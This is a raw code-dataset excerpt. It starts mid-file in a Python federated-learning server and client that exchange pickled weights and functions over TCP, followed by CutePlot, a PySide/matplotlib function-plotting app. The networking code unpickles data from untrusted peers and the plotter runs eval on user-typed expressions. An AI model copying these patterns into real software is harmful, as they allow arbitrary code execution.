aggregate(weights_set):\n\tnew_weights = [np.zeros(w.shape) for w in weights_set[0]]\n\tfor w in weights_set:\n\t\tfor i in range(len(new_weights)):\n\t\t\tnew_weights[i] += w[i]/len(weights_set)\t\n\treturn new_weights\n\ndef evaluate(getModel,X,y,accuracy_cutoff):\n\tmodel = getModel()\n\tmodel.set_weights(weights)\n\tresults = model.evaluate(X, y)\n\tprint(\"accuracy: \"+str(results[1]))\n\tprint(\"loss: \"+str(results[0]))\n\tif results[1] > accuracy_cutoff:\n\t\treturn \"STOP\"\n\telse:\n\t\treturn \"CONTINUE\"\n\ndef updateClients(client_subscribed, status):\n\tpersistentTCP_lock.acquire()\n\tfor c in client_subscribed:\n\t\tc.sendall(pickle.dumps(status))\n\tpersistentTCP_lock.release()\n\n\ndef recvall(s,size):\n\tfragments = []\n\twhile size:\n\t\tchunk = s.recv(size)\n\t\tsize -= len(chunk)\n\t\tfragments.append(chunk)\n\treturn b''.join(fragments)\n\ndef sendObject(s,obj):\n\tpickled_obj = pickle.dumps(obj)\n\ts.sendall(pickle.dumps(len(pickled_obj)))\n\tack = pickle.loads(s.recv(1024))\n\tif ack == \"OK\":\n\t\ts.sendall(pickled_obj)\n\ndef persistentTCP(host, port, max_clients):\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n\ts.bind((host, port))\n\ts.listen(max_clients)\n\tprint(\"socket binded to port\", port)\n\twhile True:\n\t\tc, addr = s.accept()\n\t\tpersistentTCP_lock.acquire()\n\t\tclient_subscribed.append(c)\n\t\tpersistentTCP_lock.release()\n\ndef communicate(c):\n\tglobal weights\n\tglobal last_client\n\tglobal weights_set\n\tglobal client_subscribed\n\tglobal aggregate_size\n\tglobal client_subscribed\n\tglobal connections\n\tglobal last_client\n\tconnections += 1\n\tclient_id = connections - 1\n\tregister_client_lock.release() \n\tmsg = c.recv(1024)\n\tif msg:\n\t\tmsg = pickle.loads(msg)\n\tif msg == \"HELLO\":\n\t\tc.sendall(pickle.dumps(\"HELLO\"))\n\telif msg == \"REQUEST MODEL FUNCTION\":\n\t\tsendObject(c,getModel)\n\telif msg == \"REQUEST PREPROCESSING\":\n\t\tsendObject(c,preprocessing)\n\telif msg == \"REQUEST DATA CLEANER\":\n\t\tsendObject(c,cleanData)\n\telif msg == \"REQUEST WEIGHTS\":\n\t\tsendObject(c,weights)\n\telif msg == \"SENDING WEIGHTS\":\n\t\tc.sendall(pickle.dumps(\"OK\"))\n\t\tsize = pickle.loads(c.recv(1024))\n\t\tif not new_weights_lock.locked():\n\t\t\tc.sendall(pickle.dumps(\"OK\"))\n\t\t\trecv_weights = pickle.loads(recvall(c,size))\n\t\t\tregister_weights_lock.acquire()\n\t\t\tweights_set.append(recv_weights)\n\t\t\tlast_client = client_id\n\t\t\tregister_weights_lock.release()\n\t\t\tif 
len(weights_set) >= aggregate_size:\n\t\t\t\ttime.sleep(wait_time)\n\t\t\t\tif last_client == client_id:\n\t\t\t\t\tnew_weights_lock.acquire()\n\t\t\t\t\tweights = aggregate(weights_set)\n\t\t\t\t\tweights_set = []\n\t\t\t\t\tstatus = evaluate(getModel,X,y,accuracy_cutoff)\n\t\t\t\t\tupdateClients(client_subscribed, status)\n\t\t\t\t\tnew_weights_lock.release()\n\t\t\t\t\tif status == \"STOP\":\n\t\t\t\t\t\tfor c in client_subscribed:\n\t\t\t\t\t\t\tc.close()\n\t\t\t\t\t\tprint(\"Threshhold Reached. Training Stopped.\")\n\n\t\telse:\n\t\t\tc.sendall(pickle.dumps(\"BUSY\"))\t\n\telse:\n\t\tc.sendall(pickle.dumps(\"REQUEST NOT ACCEPTED\"))\n\tc.close()\n\ndef connect(host,port):\n\ts = socket.socket(socket.AF_INET,socket.SOCK_STREAM) \n\ts.connect((host,port))\n\treturn s\n\ndef train(init_weights, X, y , epochs, batchsize, host, port,training_lock):\n\tglobal signal\n\ttraining_lock.acquire()\n\tsignal = False\n\tmodel = getModel()\n\tmodel.set_weights(init_weights)\n\tmodel.fit(X, y, batch_size = batchsize, epochs = epochs, callbacks=[FederatedCallback()])\n\tprint(model.evaluate(X,y))\n\tif not signal:\n\t\tsendWeights(host,port,model.get_weights())\n\ttraining_lock.release()\n\ndef startFederatedLearning(host, port, pport, weights, modelGen, X, y, epochs = 10, batchsize = 10):\n\tglobal signal\n\tglobal getModel\n\tgetModel = modelGen\n\ttraining_lock = threading.Lock()\n\tpersistentTCP = connect(host,pport)\n\tstart_new_thread(train, (weights, X,y,epochs,batchsize,host,port,training_lock,))\n\twhile True:\n\t\tmsg = persistentTCP.recv(1024)\n\t\tif not msg:\n\t\t\ttime.sleep(1)\n\t\t\tcontinue\n\t\tstatus = pickle.loads(msg)\n\t\tweights = requestWeights(host, port)\n\t\tsignal = True\n\t\tif status == \"STOP\":\n\t\t\treturn weights\n\t\telif status == \"CONTINUE\":\n\t\t\tstart_new_thread(train, (weights, X, y, epochs, batchsize, host, port, training_lock,))\n\ndef createServer(host, port, pport, max_clients, Raggregate_size, Rwait_time, Raccuracy_cutoff, RX, Ry, RgetModel, Rpreprocessing, RcleanData):\n\tglobal wait_time\n\tglobal aggregate_size\n\tglobal accuracy_cutoff\n\tglobal getModel\n\tglobal preprocessing\n\tglobal cleanData\n\tglobal weights\n\tglobal X\n\tglobal y\n\tX = RX\n\ty = Ry\n\twait_time = Rwait_time\n\taggregate_size = Raggregate_size\n\taccuracy_cutoff = Raccuracy_cutoff\n\tgetModel = RgetModel\n\tpreprocessing = Rpreprocessing\n\tcleanData = RcleanData\n\tweights = getModel().get_weights()\n\tprint(\"At Start\")\n\tevaluate(RgetModel,X,y,70)\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n\ts.bind((host, port)) \n\tprint(\"socket binded to port\", port)\n\ts.listen(max_clients*100)\n\tstart_new_thread(persistentTCP, (host ,pport, max_clients))\n\twhile True:\n\t\tc, addr = s.accept()\n\t\tregister_client_lock.acquire() \n\t\tprint('Connection ',connections,' established:', addr[0], ':', addr[1])\n\t\tstart_new_thread(communicate, (c,))\t\n","sub_path":"Eample Churn Model/federatedlearningiitp.py","file_name":"federatedlearningiitp.py","file_ext":"py","file_size_in_byte":6860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"106874315","text":"\"\"\"\nCutePlot is a platform-independent plotting program for 2-D mathematical functions.\nIncludes a feature for visualizing positive and negative log-axes together.\nJack Peterson (jack@tinybike.net)\nLicense: GPL\nLast modified: 11/14/2012 (v. 
0.11)\n\"\"\"\n\nfrom __future__ import division # Int-to-float division auto-convert from Python 3\nimport sys\nfrom math import *\nfrom PySide.QtGui import *\nfrom PySide.QtCore import *\n\n# Import matplotlib backend, specify PySide\nimport matplotlib\nimport os\nmatplotlib.use('Qt4Agg')\nmatplotlib.rcParams['backend.qt4'] = 'PySide'\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt4agg import NavigationToolbar2QTAgg as NavigationToolbar\nfrom matplotlib.figure import Figure\n\n\nclass CutePlot(QMainWindow):\n \n def __init__(self, parent=None):\n super(CutePlot, self).__init__(parent)\n \n # Default values for lower and upper bound\n self.LB_default = -10\n self.UB_default = 10\n # Create main plot area + menus + status bar\n self.create_main_frame()\n #self.textbox.setText()\n self.LB_UB_defaults()\n self.on_draw()\n self.statusBar()\n self.setWindowTitle('Graficador')\n self.create_menu()\n self.guardarImagen()\n\n def LB_UB_defaults(self):\n # Set default values for lower bound and upper bound\n self.lowerbound.setText(str(self.LB_default))\n self.upperbound.setText(str(self.UB_default))\n \n def create_main_frame(self):\n self.main_frame = QWidget()\n # 7x5 inches, 80 dots-per-inch\n self.dpi = 80\n self.fig = Figure((5, 3), dpi = self.dpi)\n self.canvas = FigureCanvas(self.fig)\n self.canvas.setParent(self.main_frame)\n \n self.is_data = False\n \n self.axes = self.fig.add_subplot(111)\n \n # axis_state keeps track of how many subplots are present\n # axis_state = 0: main plot only\n # axis_state = 1: horizontal split (quadrants 1 and 2)\n # axis_state = 2: vertical split (quadrants 1 and 4)\n # axis_state = 3: show all 4 subplots\n self.axis_state = 0\n \n self.mpl_toolbar = NavigationToolbar(self.canvas, self.main_frame)\n \n # f(x) textbox\n self.title = QLabel('<font size=4><em>f</em> (<em>x </em>) =</font>')\n self.textbox = QLineEdit()\n self.textbox.setMinimumWidth(200)\n self.connect(self.textbox, SIGNAL('returnPressed()'), self.on_draw)\n \n # Lowerbound and upperbound textboxes\n self.LB_title = QLabel('<font size=4>Min:</font>')\n self.lowerbound = QLineEdit()\n self.lowerbound.setMaximumWidth(30)\n self.connect(self.lowerbound, SIGNAL('returnPressed()'), self.on_draw)\n \n self.UB_title = QLabel('<font size=4>Max:</font>')\n self.upperbound = QLineEdit()\n self.upperbound.setMaximumWidth(30)\n self.connect(self.upperbound, SIGNAL('returnPressed()'), self.on_draw)\n \n # Plot button\n self.draw_button = QPushButton(\"&Plot\")\n self.connect(self.draw_button, SIGNAL('clicked()'), self.on_draw)\n\n # Hold checkbox\n self.hold_cb = QCheckBox(\"&Hold\")\n self.hold_cb.setChecked(False)\n self.connect(self.hold_cb, SIGNAL('stateChanged(int)'), self.on_minor_change)\n self.hold_cb.setToolTip('Prevent new plots from replacing old ones')\n self.hold_cb.setStatusTip('Prevent new plots from replacing old ones')\n \n # Log-x and log-y checkboxes\n self.logx_cb = QCheckBox(\"Log-&x\")\n self.logx_cb.setChecked(False)\n self.connect(self.logx_cb, SIGNAL('stateChanged(int)'), self.on_draw)\n self.logx_cb.setToolTip('Change x-axis to logarithmic scale')\n self.logx_cb.setStatusTip('Change x-axis to logarithmic scale')\n \n self.logy_cb = QCheckBox(\"Log-&y\")\n self.logy_cb.setChecked(False)\n self.connect(self.logy_cb, SIGNAL('stateChanged(int)'), self.on_draw)\n self.logy_cb.setToolTip('Change y-axis to logarithmic scale')\n self.logy_cb.setStatusTip('Change y-axis to logarithmic scale')\n \n # Truncated-log 
checkbox\n        self.trunc_cb = QCheckBox(\"Show &Negative\")\n        self.trunc_cb.setChecked(False)\n        self.connect(self.trunc_cb, SIGNAL('stateChanged(int)'), self.on_draw)\n        self.trunc_cb.setToolTip('Plot negative values of log-transformed functions')\n        self.trunc_cb.setStatusTip('Plot negative values of log-transformed functions')\n\n        # Grid checkbox\n        self.grid_cb = QCheckBox(\"&Grid\")\n        self.grid_cb.setChecked(False)\n        self.connect(self.grid_cb, SIGNAL('stateChanged(int)'), self.on_minor_change)\n        self.grid_cb.setToolTip('Show grid')\n        self.grid_cb.setStatusTip('Show grid')\n\n        # Grid layout\n        grid = QGridLayout()\n        grid.setSpacing(10)\n\n        gridCol = 0\n        for w in [self.title, self.textbox, self.LB_title, self.lowerbound, self.UB_title,\n                self.upperbound, self.draw_button]:\n            grid.addWidget(w, 0, gridCol)\n            gridCol += 1\n\n        grid2 = QGridLayout()\n        grid2.setSpacing(10)\n        gridCol = 0\n        for w in [self.logx_cb, self.logy_cb, self.trunc_cb, self.hold_cb, self.grid_cb]:\n            grid2.addWidget(w, 0, gridCol)\n            gridCol += 1\n\n        vbox = QVBoxLayout()\n        vbox.addLayout(grid)\n        vbox.addLayout(grid2)\n        vbox.addWidget(self.canvas)\n        vbox.addWidget(self.mpl_toolbar)\n\n        self.main_frame.setLayout(vbox)\n        self.setCentralWidget(self.main_frame)\n\n\n    def on_minor_change(self):\n        self.on_draw(self.is_data)\n\n\n    def on_draw(self, *args):\n        # Get x-domain from user input\n        self.LB_input = unicode(self.lowerbound.text())\n        self.UB_input = unicode(self.upperbound.text())\n\n        # Message box error if the domain inputs aren't int or float types\n        # If float, round to the nearest 0.1\n        round_to = 10\n        try:\n            self.LB_float = int(float(self.LB_input)*round_to)\n            self.UB_float = int(float(self.UB_input)*round_to)\n        except:\n            self.LB_UB_defaults()\n            QMessageBox.question(self, 'Error',\n                '<center>Minimum and maximum values must be<br />\\\n                integer or floating-point numbers.</center>', QMessageBox.Ok)\n\n        # Make sure UB > LB\n        if self.UB_float <= self.LB_float:\n            self.LB_UB_defaults()\n            QMessageBox.question(self, 'Error',\n                '<center>Maximum must be greater\\\n                than minimum value.</center>', QMessageBox.Ok)\n\n        # If plotting a function, then get x and y values\n        if len(args) == 0:\n            self.is_data = False\n\n            # Set x values (/round_to is to use range() with floating-point numbers)\n            self.input_x = range(self.LB_float, self.UB_float + 1)\n            self.input_x = [i/float(round_to) for i in self.input_x]\n\n            # Calculate f(x) values for specified function\n            fx = unicode(self.textbox.text())\n            # If the f(x) field is empty, then default to y = 0 plot\n            if fx == '':\n                self.y = [0 for i in self.input_x]\n            # Otherwise, evaluate the specified function and get ready to plot\n            else:\n                # Replace exp with numbers\n                fx = fx.replace('exp', str(exp(1)) + '**')\n                # Allow users to enter ^ for powers (replace ^ with **)\n                fx = fx.replace('^', '**')\n                # Try and evaluate; if there is an error, then shift slightly to the right\n                try:\n                    self.y = [eval(fx) for x in self.input_x]\n                except:\n                    fx = fx.replace('x', '(x + 10**(-6))')\n                    self.y = [eval(fx) for x in self.input_x]\n        self.plot_symbol = '-'\n        if self.is_data:\n            self.plot_symbol = 'o'\n\n        # If the hold box is checked, then new plots do not erase old ones\n        new_state = self.quad_check()\n        if self.axis_state == 0:\n            self.axes.hold(self.hold_cb.isChecked())\n        else:\n            if self.hold_cb.isChecked():\n                # If 'hold' is checked, see what quadrants will be shown\n                # - if the quadrant state changes, remove subplots\n                # - otherwise retain subplots\n                if self.axis_state == 0 and new_state == 0:\n
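                    # unchanged quadrant layout: hold the axes that are already present\n                    # (note: this first case is unreachable, since axis_state != 0 inside this else branch)\n                    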
self.axes.hold(self.hold_cb.isChecked())\n elif self.axis_state == 3 and new_state == 3:\n self.axes_Q1.hold(self.hold_cb.isChecked())\n self.axes_Q2.hold(self.hold_cb.isChecked())\n self.axes_Q3.hold(self.hold_cb.isChecked())\n self.axes_Q4.hold(self.hold_cb.isChecked())\n elif self.axis_state == 1 and new_state == 1:\n self.axes_Q1.hold(self.hold_cb.isChecked())\n self.axes_Q2.hold(self.hold_cb.isChecked())\n elif self.axis_state == 2 and new_state == 2:\n self.axes_Q1.hold(self.hold_cb.isChecked())\n self.axes_Q4.hold(self.hold_cb.isChecked())\n else:\n self.remove_subplots()\n else:\n self.remove_subplots()\n \n # If show negative box is unchecked\n if not self.trunc_cb.isChecked():\n self.add_main()\n self.axes.plot(self.input_x, self.y, self.plot_symbol)\n if not self.logx_cb.isChecked() and not self.logy_cb.isChecked():\n self.axes.set_xscale('linear')\n self.axes.set_yscale('linear')\n elif self.logx_cb.isChecked() and not self.logy_cb.isChecked():\n self.axes.set_xscale('log')\n self.axes.set_yscale('linear')\n elif not self.logx_cb.isChecked() and self.logy_cb.isChecked():\n self.axes.set_xscale('linear')\n self.axes.set_yscale('log')\n else:\n self.axes.set_xscale('log')\n self.axes.set_yscale('log')\n else:\n # Linear plot\n #if not self.logx_cb.isChecked() and not self.logy_cb.isChecked():\n if new_state == 0:\n self.add_main()\n self.axes.plot(self.input_x,self.y,self.plot_symbol)\n \n # Log x, linear y plot\n #elif self.logx_cb.isChecked() and not self.logy_cb.isChecked():\n elif new_state == 1:\n if not self.trunc_cb.isChecked():\n self.add_main()\n self.axes.semilogx(self.input_x,self.y,self.plot_symbol)\n else:\n self.trunc_logx()\n \n # Linear x, log y plot\n #elif not self.logx_cb.isChecked() and self.logy_cb.isChecked():\n elif new_state == 2:\n if not self.trunc_cb.isChecked():\n self.add_main()\n self.axes.semilogy(self.input_x,self.y,self.plot_symbol)\n else:\n self.trunc_logy()\n \n # Log-log plot\n else:\n if not self.trunc_cb.isChecked():\n self.add_main()\n self.axes.loglog(self.input_x,self.y,self.plot_symbol)\n else:\n self.trunc_loglog()\n \n # Add grid if grid checkbox is checked\n if self.axis_state == 0:\n self.axes.grid(self.grid_cb.isChecked())\n else:\n if hasattr(self, 'axes_Q1'):\n self.axes_Q1.grid(self.grid_cb.isChecked())\n if hasattr(self, 'axes_Q2'):\n self.axes_Q2.grid(self.grid_cb.isChecked())\n if hasattr(self, 'axes_Q3'):\n self.axes_Q3.grid(self.grid_cb.isChecked())\n if hasattr(self, 'axes_Q4'):\n self.axes_Q4.grid(self.grid_cb.isChecked())\n \n self.axes.set_xlabel('$x$')\n self.axes.set_ylabel('$f(x)$')\n self.canvas.draw()\n self.guardarImagen()\n \n \n def remove_subplots(self):\n # Remove all subplots and axis flip flags\n if hasattr(self, 'axes_Q1'):\n self.fig.delaxes(self.axes_Q1)\n del self.axes_Q1\n if hasattr(self, 'axes_Q2'):\n self.fig.delaxes(self.axes_Q2)\n del self.axes_Q2\n if hasattr(self, 'flip_Q2'):\n del self.flip_Q2\n if hasattr(self, 'axes_Q3'):\n self.fig.delaxes(self.axes_Q3)\n del self.axes_Q3\n del self.flip_Q3\n if hasattr(self, 'axes_Q4'):\n self.fig.delaxes(self.axes_Q4)\n del self.axes_Q4\n if hasattr(self, 'flip_Q4'):\n del self.flip_Q4\n \n def add_main(self):\n # Reinsert the main plot\n if self.axis_state > 0:\n self.remove_subplots()\n self.axes = self.fig.add_subplot(111)\n self.axis_state = 0\n \n def create_menu(self):\n exitAction = QAction('Quit', self)\n exitAction.setShortcut('Ctrl+Q')\n exitAction.setStatusTip('Exit application')\n exitAction.triggered.connect(self.close)\n \n menubar = 
self.menuBar()\n fileMenu = menubar.addMenu('&File')\n \n save_plot_action = self.create_action(\"&Save plot\",\n shortcut = \"Ctrl+S\", slot = self.save_plot, \n tip = \"Save image to file\")\n import_data_action = self.create_action(\"&Import data\",\n shortcut = \"Ctrl+I\", slot = self.import_data,\n tip = \"Import data from file\")\n fileMenu.addAction(save_plot_action)\n fileMenu.addAction(import_data_action)\n fileMenu.addAction(exitAction)\n \n helpMenu = self.menuBar().addMenu(\"&Help\")\n about_action = self.create_action(\"&About\", \n shortcut = 'F1', slot = self.on_about, \n tip = 'About CutePlot')\n helpMenu.addAction(about_action)\n\n def create_action(self, text, slot = None, shortcut = None, \n icon = None, tip = None, checkable = False, \n signal = \"triggered()\"):\n action = QAction(text, self)\n if icon is not None:\n action.setIcon(QIcon(\":/%s.png\" % icon))\n if shortcut is not None:\n action.setShortcut(shortcut)\n if tip is not None:\n action.setToolTip(tip)\n action.setStatusTip(tip)\n if slot is not None:\n self.connect(action, SIGNAL(signal), slot)\n if checkable:\n action.setCheckable(True)\n return action\n \n def save_plot(self):\n file_choices = \"PNG (*.png)\"\n path = unicode(QFileDialog.getSaveFileName(self, 'Save file', '', file_choices))\n if path:\n self.canvas.print_figure(path, dpi = self.dpi)\n self.statusBar().showMessage('Saved to %s' % path, 2000)\n \n def import_data(self):\n file_choices = \"*.csv;;*.txt;;*.tab;;*.dat;;*.*\"\n self.path = QFileDialog.getOpenFileName(self, 'Import data', '', file_choices)\n if self.path:\n datafile = open(self.path[0], 'r')\n if datafile:\n self.is_data = True\n delimiter = ','\n input_xy = [map(float, line.strip().split(delimiter)) for line in datafile]\n self.input_x, self.y = [[row[col] for row in input_xy] for col in [0, 1]]\n datafile.close()\n self.statusBar().showMessage('Imported data', 2000)\n self.on_draw(self.is_data)\n \n def on_about(self):\n msg = \"\"\"<center><b>CutePlot v. 
0.1</b></center>\n <center>Free, open-source plotting program,<br />\n written in Python (PySide/Qt + matplotlib).</center>\n <center>(c) Jack Peterson, 2012</center>\n \"\"\"\n QMessageBox.about(self, \"About\", msg.strip())\n \n def quad_check(self):\n # Q = quadrant\n Q1 = False\n Q2 = False\n Q3 = False\n Q4 = False\n \n # Split the x and y values by sign\n for j in range(0, len(self.input_x)):\n if self.input_x[j] > 0 and self.y[j] > 0:\n Q1 = True\n elif self.input_x[j] < 0 and self.y[j] > 0:\n Q2 = True\n elif self.input_x[j] < 0 and self.y[j] < 0:\n Q3 = True\n elif self.input_x[j] > 0 and self.y[j] < 0:\n Q4 = True\n \n \n if (Q3 or (Q2 and Q4) or ((Q2 or Q4) and self.axis_state == 3)) and self.logx_cb.isChecked() and self.logy_cb.isChecked():\n new_state = 3\n elif (Q2 and self.logx_cb.isChecked()) or (self.hold_cb.isChecked() and self.axis_state == 1):\n new_state = 1\n elif (Q4 and self.logy_cb.isChecked()) or (self.hold_cb.isChecked() and self.axis_state == 2):\n new_state = 2\n else:\n new_state = 0\n \n return new_state\n \n def trunc_logx(self):\n # Q = quadrant\n Q1_x = []\n Q1_y = []\n Q2_x = []\n Q2_y = []\n \n # Split the x and y values by sign\n for j in range(0, len(self.input_x)):\n if self.input_x[j] > 0 and self.y[j] > 0:\n Q1_x.append(self.input_x[j])\n Q1_y.append(self.y[j])\n elif self.input_x[j] < 0 and self.y[j] > 0:\n Q2_x.append(-self.input_x[j])\n Q2_y.append(self.y[j])\n \n # If only Q1 is populated, then use an ordinary semilogx plot\n if Q2_x == [] and not self.hold_cb.isChecked():\n self.add_main()\n self.axes.semilogx(self.input_x, self.y, self.plot_symbol)\n \n # Otherwise, create a truncated plot\n else:\n # Remove main axes\n if self.axis_state == 0:\n self.fig.delaxes(self.axes)\n \n if self.axis_state == 2 or self.axis_state == 3:\n self.axis_state = 3\n else:\n self.axis_state = 1\n \n # Create 2 subplots\n self.axes_Q1 = self.fig.add_subplot(122)\n self.axes_Q2 = self.fig.add_subplot(121)\n self.axes_Q1.autoscale(enable = True)\n self.axes_Q2.autoscale(enable = True)\n self.axes_Q1.semilogx(Q1_x, Q1_y, self.plot_symbol)\n self.axes_Q2.semilogx(Q2_x, Q2_y, self.plot_symbol)\n \n # Reverse Q2 x-axis\n if not hasattr(self, 'flip_Q2'):\n self.flip_Q2 = True\n self.axes_Q2.set_xlim(self.axes_Q2.get_xlim()[::-1])\n \n # Set axis tickmarks at powers of 10\n # Q1 axes\n if Q1_x == [] and not self.hold_cb.isChecked():\n self.axes_Q1.set_xticklabels([])\n else:\n try:\n x_UB_Q1 = int(ceil(log10(max(Q1_x))))\n x_LB_Q1 = int(floor(log10(min(Q1_x))))\n except:\n x_UB_Q1 = 2\n x_LB_Q1 = -1\n Q1_xlabels = []\n for i in range(x_LB_Q1, x_UB_Q1 + 1):\n Q1_xlabels.append('$10^{%s}$' % str(i))\n self.axes_Q1.set_xticklabels(Q1_xlabels)\n self.axes_Q1.xaxis.tick_bottom()\n self.axes_Q1.yaxis.tick_right()\n \n # Q2 axes\n if Q2_x == [] and not self.hold_cb.isChecked():\n self.axes_Q2.set_xticklabels([])\n else:\n try:\n x_UB_Q2 = int(ceil(log10(max(Q2_x))))\n x_LB_Q2 = int(floor(log10(min(Q2_x))))\n except:\n x_UB_Q2 = 2\n x_LB_Q2 = -1\n Q2_xlabels = []\n for i in range(x_LB_Q2, x_UB_Q2 + 1):\n Q2_xlabels.append('$-10^{%s}$' % str(i))\n self.axes_Q2.set_xticklabels(Q2_xlabels)\n self.axes_Q2.xaxis.tick_bottom()\n self.axes_Q2.yaxis.tick_left()\n \n def trunc_logy(self):\n # Q = quadrant\n Q1_x = []\n Q1_y = []\n Q4_x = []\n Q4_y = []\n \n # Split the x and y values by sign\n for j in range(0, len(self.input_x)):\n if self.input_x[j] > 0 and self.y[j] > 0:\n Q1_x.append(self.input_x[j])\n Q1_y.append(self.y[j])\n elif self.input_x[j] > 0 and self.y[j] < 0:\n 
Q4_x.append(self.input_x[j])\n Q4_y.append(-self.y[j])\n \n # If only Q1 is populated, then use an ordinary semilogy plot\n if Q4_x == [] and not self.hold_cb.isChecked():\n self.add_main()\n self.axes.semilogy(self.input_x, self.y, self.plot_symbol)\n \n # Otherwise, create a truncated plot\n else:\n # Remove main axes\n if self.axis_state == 0:\n self.fig.delaxes(self.axes)\n \n if self.axis_state == 1 or self.axis_state == 3:\n self.axis_state = 3\n else:\n self.axis_state = 2\n \n # Create 2 subplots\n self.axes_Q1 = self.fig.add_subplot(211)\n self.axes_Q4 = self.fig.add_subplot(212)\n self.axes_Q1.autoscale(enable = True)\n self.axes_Q4.autoscale(enable = True)\n self.axes_Q1.semilogy(Q1_x, Q1_y, self.plot_symbol)\n self.axes_Q4.semilogy(Q4_x, Q4_y, self.plot_symbol)\n \n # Reverse Q4 y-axis\n if not hasattr(self, 'flip_Q4'):\n self.flip_Q4 = True\n self.axes_Q4.set_ylim(self.axes_Q4.get_ylim()[::-1])\n \n # Set axis tickmarks at powers of 10\n # Q1 axes\n if Q1_x == [] and not self.hold_cb.isChecked():\n self.axes_Q1.set_yticklabels([])\n else:\n try:\n y_UB_Q1 = int(ceil(log10(max(Q1_y))))\n y_LB_Q1 = int(floor(log10(min(Q1_y))))\n except:\n y_UB_Q1 = 2\n y_LB_Q1 = -1\n Q1_ylabels = []\n for i in range(y_LB_Q1, y_UB_Q1 + 1):\n Q1_ylabels.append('$10^{%s}$' % str(i))\n self.axes_Q1.set_yticklabels(Q1_ylabels)\n self.axes_Q1.xaxis.tick_top()\n self.axes_Q1.yaxis.tick_right()\n \n # Q4 axes\n if Q4_x == [] and not self.hold_cb.isChecked():\n self.axes_Q4.set_yticklabels([])\n else:\n try:\n y_UB_Q4 = int(ceil(log10(max(Q4_y))))\n y_LB_Q4 = int(floor(log10(min(Q4_y))))\n except:\n y_UB_Q4 = 2\n y_LB_Q4 = -1\n Q4_ylabels = []\n for i in range(y_LB_Q4, y_UB_Q4 + 1):\n Q4_ylabels.append('$-10^{%s}$' % str(i))\n self.axes_Q4.set_yticklabels(Q4_ylabels)\n self.axes_Q4.xaxis.tick_bottom()\n self.axes_Q4.yaxis.tick_right()\n \n \n def trunc_loglog(self):\n # Q = quadrant\n Q1_x = []\n Q1_y = []\n Q2_x = []\n Q2_y = []\n Q3_x = []\n Q3_y = []\n Q4_x = []\n Q4_y = []\n \n # Split the x and y values by sign\n for j in range(0, len(self.input_x)):\n if self.input_x[j] > 0 and self.y[j] > 0:\n Q1_x.append(self.input_x[j])\n Q1_y.append(self.y[j])\n elif self.input_x[j] < 0 and self.y[j] > 0:\n Q2_x.append(-self.input_x[j])\n Q2_y.append(self.y[j])\n elif self.input_x[j] < 0 and self.y[j] < 0:\n Q3_x.append(-self.input_x[j])\n Q3_y.append(-self.y[j])\n elif self.input_x[j] > 0 and self.y[j] < 0:\n Q4_x.append(self.input_x[j])\n Q4_y.append(-self.y[j])\n \n # If only Q1 is populated, then use an ordinary loglog plot\n if Q2_x == [] and Q3_x == [] and Q4_x == [] and not self.hold_cb.isChecked():\n self.add_main()\n self.axes.loglog(self.input_x, self.y, self.plot_symbol)\n \n # Otherwise, create a truncated plot\n else:\n # Remove main axes\n if self.axis_state == 0:\n self.fig.delaxes(self.axes)\n self.axis_state = 3\n \n # Create 4 subplots\n self.axes_Q1 = self.fig.add_subplot(222)\n self.axes_Q2 = self.fig.add_subplot(221)\n self.axes_Q3 = self.fig.add_subplot(223)\n self.axes_Q4 = self.fig.add_subplot(224)\n self.axes_Q1.autoscale(enable = True)\n self.axes_Q2.autoscale(enable = True)\n self.axes_Q3.autoscale(enable = True)\n self.axes_Q4.autoscale(enable = True)\n self.axes_Q1.loglog(Q1_x, Q1_y, self.plot_symbol)\n self.axes_Q2.loglog(Q2_x, Q2_y, self.plot_symbol)\n self.axes_Q3.loglog(Q3_x, Q3_y, self.plot_symbol)\n self.axes_Q4.loglog(Q4_x, Q4_y, self.plot_symbol)\n \n if not hasattr(self, 'flip_Q3'):\n self.flip_Q3 = True\n \n # Reverse Q2 x-axis\n 
self.axes_Q2.set_xlim(self.axes_Q2.get_xlim()[::-1]) \n \n # Reverse Q3 x- and y-axes\n self.axes_Q3.set_xlim(self.axes_Q3.get_xlim()[::-1])\n self.axes_Q3.set_ylim(self.axes_Q3.get_ylim()[::-1])\n \n # Reverse Q4 y-axis\n self.axes_Q4.set_ylim(self.axes_Q4.get_ylim()[::-1])\n \n # Set axis tickmarks at powers of 10\n # Q1 axes\n if Q1_x == [] and not self.hold_cb.isChecked():\n self.axes_Q1.set_xticklabels([])\n self.axes_Q1.set_yticklabels([])\n else:\n try:\n x_UB_Q1 = int(ceil(log10(max(Q1_x))))\n y_UB_Q1 = int(ceil(log10(max(Q1_y))))\n x_LB_Q1 = int(floor(log10(min(Q1_x))))\n y_LB_Q1 = int(floor(log10(min(Q1_y))))\n except:\n x_UB_Q1 = 2\n y_UB_Q1 = 2\n x_LB_Q1 = -1\n y_LB_Q1 = -1\n Q1_xlabels = []\n Q1_ylabels = []\n for i in range(x_LB_Q1, x_UB_Q1 + 1):\n Q1_xlabels.append('$10^{%s}$' % str(i))\n for i in range(y_LB_Q1, y_UB_Q1 + 1):\n Q1_ylabels.append('$10^{%s}$' % str(i))\n self.axes_Q1.set_xticklabels(Q1_xlabels)\n self.axes_Q1.set_yticklabels(Q1_ylabels)\n self.axes_Q1.xaxis.tick_top()\n self.axes_Q1.yaxis.tick_right()\n \n # Q2 axes\n if Q2_x == [] and not self.hold_cb.isChecked():\n self.axes_Q2.set_xticklabels([])\n self.axes_Q2.set_yticklabels([])\n else:\n try:\n x_UB_Q2 = int(ceil(log10(max(Q2_x))))\n y_UB_Q2 = int(ceil(log10(max(Q2_y))))\n x_LB_Q2 = int(floor(log10(min(Q2_x))))\n y_LB_Q2 = int(floor(log10(min(Q2_y))))\n except:\n x_UB_Q2 = 2\n y_UB_Q2 = 2\n x_LB_Q2 = -1\n y_LB_Q2 = -1\n Q2_xlabels = []\n Q2_ylabels = []\n for i in range(x_LB_Q2, x_UB_Q2 + 1):\n Q2_xlabels.append('$-10^{%s}$' % str(i))\n for i in range(y_LB_Q2, y_UB_Q2 + 1):\n Q2_ylabels.append('$10^{%s}$' % str(i))\n self.axes_Q2.set_xticklabels(Q2_xlabels)\n self.axes_Q2.set_yticklabels(Q2_ylabels)\n self.axes_Q2.xaxis.tick_top()\n self.axes_Q2.yaxis.tick_left()\n 